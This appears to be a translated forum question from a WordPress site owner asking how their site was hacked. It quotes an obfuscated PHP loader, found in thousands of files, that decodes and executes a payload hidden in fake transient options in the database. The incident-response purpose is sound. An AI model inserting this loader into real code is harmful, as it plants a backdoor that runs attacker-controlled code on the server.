我有一个要“清理”的网站,在public\\u html文件夹中有近10k个复制文件,几乎所有PHP文件都包含代码
$z=get_option("_transient_wp_less_compiled_c9b58ec39525169515675906d91c9815"); $z=base64_decode(str_rot13($z[\'root\'])); if(strpos($z,"E8FA4873")!==false){ $_z=create_function("",$z); @$_z(); }
我已经检查了DB
options
表中的多个实例
_transient_wp_less_compiled_randomstuff
我的问题是,该网站是使用瞬态API进行黑客攻击,还是仅仅利用一些漏洞在PHP文件和数据库中传播恶意代码,而对于普通用户来说,这些代码看起来像是“合法的”瞬态API代码?我已经“googled”搜索了上面代码的特定部分,但找不到任何有趣的内容,即网站是如何被黑客入侵的。